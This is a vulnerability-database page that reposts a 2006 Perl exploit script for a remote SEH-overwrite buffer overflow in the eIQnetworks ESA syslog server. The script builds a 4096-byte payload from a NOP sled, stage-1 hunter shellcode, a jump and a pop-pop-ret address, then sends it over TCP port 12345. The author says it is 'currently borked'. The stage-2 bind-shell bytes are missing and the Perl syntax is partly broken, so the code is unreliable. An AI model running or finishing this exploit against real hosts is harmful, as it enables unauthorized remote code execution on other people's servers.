eIQnetworks ESA - Syslog Server Remote Buffer Overflow

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055832 漏洞类型
发布时间 2006-07-27 更新时间 2006-07-27
漏洞平台 Windows CVSS评分 N/A
#!/usr/bin/perl -w
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
# Bug found by KF of digitalmunition.com.
# http://www.zerodayinitiative.com/advisories/ZDI-06-023.html
# Exploit for * Syslog Server by eiQnetworks  (OEM for Several vendors)
# There MUST be a syslog service listening on port 12345 for this to work. The syslog service is not enabled by default
# Currently borked... This shit overwrites the SEH on XP SP1. It just needs good shellcode. perhaps a reverse style jmp instead of a 
# forward jump. This would eliminate the need for 2 stages of shellcode. .  
#SEH chain of thread 00000FF4
#Address    SE handler
#013ECEF8   FWASyslo.00449EDB
#013EFF78   WS2HELP.71AA15CF   <-------- I set this address. 
#013EFF74   90909090
#013EFF78   909032EB  Pointer to next SEH record  <--- I set this. 
#013EFF7C   71AA15CF  SE handler   <--- pop pop ret 
#013EFF80   90909090
#71AA15CF   5F               POP EDI
#71AA15D0   5D               POP EBP
#71AA15D1   C2 0800          RETN 8
# View the SEH Chain and set a break on the address of the JMP code. This will let you debug the stage one shellcode.
use IO::Socket;

$bufsize = 4096; 

$hostname = "";
$nextserec = pack("l", (0xEB069090)); # jmp short +0x06
$sehandler = pack("V", (0x71abe325)); # pop edi, pop ebp, retn - ws2help.dll  (Send this reversed note the 'V')

# Binary hunts performed by JxT and Titon
$tgts{"0"} = "G2SRv4.0.36.exe:932"; # Use length to SEH overwrite. 

unless (($target,$hostname) = @ARGV,$hostname) {

        print "\n        Syslog by eiQnetworks exploit, kf \(kf_lists[at]digitalmunition[dot]com\) - 03/23/2006\n";
        print "\n\nUsage: $0 <target> <host>\n\nTargets:\n\n";

        foreach $key (sort(keys %tgts)) {
                ($a,$b) = split(/\:/,$tgts{"$key"});
                print "\t$key . $a\n";

        print "\n";
        exit 1;

($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a, Len: $b\n";

# Stage 2 shellcode can be up to Length of SEH overwrite. 
$sc2 = 
# win32_bind -  EXITFUNC=seh LPORT=4444 
# Size=344 Encoder=PexFnstenvSub http://metasploit.com

# Stage 1 shellcode can only be 128 butes. 
# 12 byte Nop find code by skylined?  This is bullshit right now... it does not hunt for the right shit. 
$sc1 = "\x5f\x54\x90\xb8\x90\x90\xfc\x90\xaf\xf2\xc3\x57";

# for XP SP1  
#  <nops> <stage 2 shellcode><jmp code> <pop pop ret> <nops> <128 byte or less stage 1 shellcode> 

# Should total 4096
$buf = "\x90" x ($b - length($sc2)) . $sc2 . $nextserec  . $sehandler . "\x90" x (128 - length($sc1)) . $sc1 . "\x58" x ($bufsize-$b-8-128);  

print "Exploiting $hostname\n";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$hostname, PeerPort=>12345, Type=>SOCK_STREAM);

$sock or die "no socket :$!\n"; 

print $sock "$buf";
close $sock;

# milw0rm.com [2006-07-27]